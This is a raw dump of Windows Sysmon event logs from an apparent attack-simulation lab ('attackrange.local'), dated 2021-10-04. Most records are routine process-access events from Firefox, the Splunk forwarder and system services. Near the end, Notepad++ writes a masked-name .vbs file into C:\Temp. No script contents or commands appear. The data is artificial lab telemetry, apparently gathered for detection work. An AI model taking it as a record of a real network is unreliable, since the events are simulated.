Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107753Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.478{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0902-00000000FC01}6624C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107752Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.478{58E9C193-B422-615A-0602-00000000FC01}55524560C:\Program Files\Mozilla Firefox\firefox.exe{58E9C193-B426-615A-0802-00000000FC01}1112C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b78e1|C:\Program Files\Mozilla Firefox\xul.dll+a026ef|C:\Program Files\Mozilla Firefox\xul.dll+a4ff28|C:\Program Files\Mozilla Firefox\xul.dll+e5acd8|C:\Program Files\Mozilla Firefox\xul.dll+2165eb|C:\Program Files\Mozilla Firefox\xul.dll+89b961|C:\Program Files\Mozilla Firefox\xul.dll+19ae8d1|C:\Program Files\Mozilla Firefox\xul.dll+167c38c|C:\Program Files\Mozilla Firefox\xul.dll+19d767c|C:\Program Files\Mozilla Firefox\xul.dll+9f4b1f|C:\Program Files\Mozilla Firefox\xul.dll+2660e|C:\Program Files\Mozilla Firefox\xul.dll+19fd48|C:\Program Files\Mozilla Firefox\xul.dll+19ebff|C:\Program Files\Mozilla Firefox\xul.dll+421d77a|C:\Program Files\Mozilla Firefox\xul.dll+4289755|C:\Program Files\Mozilla Firefox\xul.dll+428a573|C:\Program Files\Mozilla Firefox\xul.dll+1efe833|C:\Program Files\Mozilla Firefox\firefox.exe+5c6d|C:\Program Files\Mozilla Firefox\firefox.exe+1bbb8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107751Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.310{58E9C193-B533-615A-6302-00000000FC01}61805500C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107750Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.130{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B533-615A-6302-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107749Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.128{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107748Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.128{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107747Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.128{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107746Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.128{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107745Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.127{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B533-615A-6302-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107744Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.127{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B533-615A-6302-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107743Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.127{58E9C193-B533-615A-6302-00000000FC01}6180C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107742Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.110{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A2BD0675AF09B0D6B562854D1819EE6,SHA256=7536898BF62F35EE7620F0B666A3974013681C0FA631AB697E60DFF71F2B4C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107741Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:02:59.110{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C47DAA4E6809BCB0280B03CAAA453E63,SHA256=0914F0E07C6BA95B264545A862D4F887E8CBEB193D0FB9419515C513D3E2A82B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107770Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.930{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF45B4F8A85C4F9D983F3E6539AF0ACD,SHA256=FD782965947C556DD276AC4FB6A497BCAA856B7DF6F52210D85FB81ACFE89977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083656Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:00.480{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68A2D767DCEA3A9434700F786A95ED57,SHA256=130A14F711785D83404BCC0C999BE838CCEA12846D0B7FC7FBBDA36523228D42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107769Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B534-615A-6402-00000000FC01}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107768Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107767Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107766Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107765Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107764Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B534-615A-6402-00000000FC01}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107763Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.246{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B534-615A-6402-00000000FC01}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107762Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.248{58E9C193-B534-615A-6402-00000000FC01}7760C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107761Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:00.146{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6A2BD0675AF09B0D6B562854D1819EE6,SHA256=7536898BF62F35EE7620F0B666A3974013681C0FA631AB697E60DFF71F2B4C30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083655Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:00.105{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B30DAF50F62D5728453B50495EE938BC,SHA256=D21EB5991D17EF5BD8090A75D428CBCE6F7ED88BC02A6AA164E0BB480860E70F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083654Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:00.105{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A07EBE26ED2B79F6C9B1AD7012AEAB6E,SHA256=8FC785AAA32BA5069709D6ABB75F6EF03632C92497B8660999FF75AEC3326623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107775Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.944{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF2BDBE971C65FFDE85F37A4D14FB67,SHA256=76242D3F718A1A2B0EAA4CC36F7DE0C69049EAE70B654A89D5BB6C8DFB296A63,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083657Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:01.480{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2031834A3B2C0D568B4D8FABF986A5A3,SHA256=45FAEC5CE9E2A4FA8B439F10DC67F4193FC7AFA30D4ED82EC7B06B58DFBCD4CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107774Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.361{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\_______ _____ ___ ______ ______.vbs@2021-10-04_080257MD5=AEA7EAF00775177B9AEBBD36EF6B17C4,SHA256=5E650A74743BF99299CB2D1EE96D4B04D281399BDAF279149FD4FB2BF9B54160,IMPHASH=00000000000000000000000000000000falsetrue 11241100x8000000000000000107773Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.361{58E9C193-B11C-615A-9C01-00000000FC01}5944C:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbs2021-10-04 07:34:26.000 23542300x8000000000000000107772Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.361{58E9C193-B11C-615A-9C01-00000000FC01}5944ATTACKRANGE\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Temp\_______ _____ ___ ______ ______.vbsMD5=AEA7EAF00775177B9AEBBD36EF6B17C4,SHA256=5E650A74743BF99299CB2D1EE96D4B04D281399BDAF279149FD4FB2BF9B54160,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107771Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.276{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C3829AB6311AC0E8C5F259011BBF9967,SHA256=7E3911799CFA2ED52965654D2521E10DFFE860EC4272E1AEC3F52A7ED271DCD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107786Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:01.320{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 